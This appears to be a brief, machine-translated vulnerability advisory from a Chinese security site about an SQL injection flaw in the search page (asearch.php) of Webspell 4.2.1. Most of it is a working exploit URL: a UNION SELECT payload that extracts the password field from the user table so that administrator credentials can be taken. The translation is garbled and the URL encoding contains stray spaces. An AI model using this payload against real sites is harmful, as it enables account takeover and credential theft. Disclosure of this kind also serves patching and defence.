Webspell 4.2.1 search-injection vulnerability-a vulnerability warning-the black bar safety net

2010-10-02T00:00:00
ID MYHACK58:62201028006
Type myhack58
Reporter 佚名
Modified 2010-10-02T00:00:00

Description

Webspell 4.2.1 procedures exist to search-typeSQL injectioncould obtain the administrator user password

Search injected into the page:

http://localhost/webspell/asearch.php?site=search&table=user&column=nickname&exact=true&identifier=userID&searchtemp=search_user&search=

Storm the Admin Password field statement:

http://localhost/webspell/asearch.php?site=search&table=user&column=nickname&exact=true&identifier=userID&searchtemp=search_user&search= admin%2 5 2 7%20UNION+/**/+SELECT%201,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1%20FROM%20ws_2lu_user%20WHERE%2 0% 2 5 2 7 1% 2 5 2 7=%2 5 2 7 1